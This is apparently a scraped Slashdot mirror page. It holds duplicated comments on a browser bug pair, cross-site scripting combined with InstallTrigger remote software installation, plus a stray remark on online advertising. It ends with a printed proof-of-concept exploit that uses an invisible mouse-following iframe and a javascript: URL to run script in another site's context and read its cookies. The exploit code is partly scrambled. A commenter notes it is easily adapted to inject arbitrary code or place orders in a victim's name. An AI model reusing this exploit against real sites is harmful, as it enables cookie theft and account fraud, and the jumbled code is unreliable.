That's the dilemma of online advertising. Since there is a way to measure some form of success (direct clickthroughs), the rest of the advertising potential is pretty much ignored. Somehow the notion that advertising offers more indirect forms of increasing business died with the dotcom bubble, and with it died reasonable per-contact pricing for online advertising space, driving publishers to subscription models.
FYI: That change breaks the published exploit, but the exploit can be modified (quite easily, I might add) to inject arbitrary code into a trusted site.
There are two independent bugs which are combined in the demo exploit. The cross site scripting part does not require any whitelist privilege whatsoever. If you're using login cookies, you're vulnerable. It is entirely possible to write an exploit which orders stuff from online stores, in your name and from your IP address.
Combined with the cross site scripting bug, the whitelist requirement of the remote execution bug is moot, because a site can simply inject code into one of the standard whitelisted sites. The temporary fix on UMO breaks the published exploit, but there is no reason why an exploit couldn't simply inject its own call to InstallTrigger.install into one of these sites.
This is a VERY dangerous combination of bugs. There will be exploits. The only way to escape both bugs is to turn off Javascript. Turning off software installation just prevents the remote execution, not the cross site scripting.
Slashdot Mirror
That's the dilemma of online advertising. Since there is a way to measure some form of success (direct clickthroughs), the rest of the advertising potential is pretty much ignored. Somehow the notion that advertising offers more indirect forms of increasing business died with the dotcom bubble, and with it died reasonable per-contact pricing for online advertising space, driving publishers to subscription models.
FYI: That change breaks the published exploit, but the exploit can be modified (quite easily, I might add) to inject arbitrary code into a trusted site.
There are two independent bugs which are combined in the demo exploit. The cross site scripting part does not require any whitelist privilege whatsoever. If you're using login cookies, you're vulnerable. It is entirely possible to write an exploit which orders stuff from online stores, in your name and from your IP address. Combined with the cross site scripting bug, the whitelist requirement of the remote execution bug is moot, because a site can simply inject code into one of the standard whitelisted sites. The temporary fix on UMO breaks the published exploit, but there is no reason why an exploit couldn't simply inject its own call to InstallTrigger.install into one of these sites. This is a VERY dangerous combination of bugs. There will be exploits. The only way to escape both bugs is to turn off Javascript. Turning off software installation just prevents the remote execution, not the cross site scripting.
It's out there, so anything goes, right?
' ;function l(){c++;if= function(e){
<html><body>Click anywhere.<script
language="JavaScript" type="text/javascript">
url='http://slashdot.org
(c==1)sc.focus();else if(c==2){sc.history.go(
-1)}}f = '<iframe onload="l()" src="javascri';
f+= 'pt:\'<noscript>\'+eval(\'if (window.nam';
f+= 'e!=\\\'sc\\\'){window.name=\\\'sc\\\';}';
f+= 'else{alert(document.cookie);}\')+\'</no';
f+= 'script><a href=\\\''+url+'\\\' style=\\';
f+= '\'cursor:default;\\\'>  ';
f+= ';</\'+\'a>\'" id="targetframe" scrollin';
f+= 'g="no" frameborder="0" marginwidth="0" ';
f+= 'marginheight="0" style="position:absolu';
f+= 'te;left:0px;height:6px;width:6px;margin';
f+= ':0px; padding:0px; -moz-opacity:0;"></i';
f+= 'frame>';document.write(f);
document.onmousemove
document.getElementById("target"+ "frame").style.left=(e.pageX-3)+ "px";
document.getElementById("target" +"frame").style.top= (e.pageY-3)+"px"};
c=0;</script></body></html>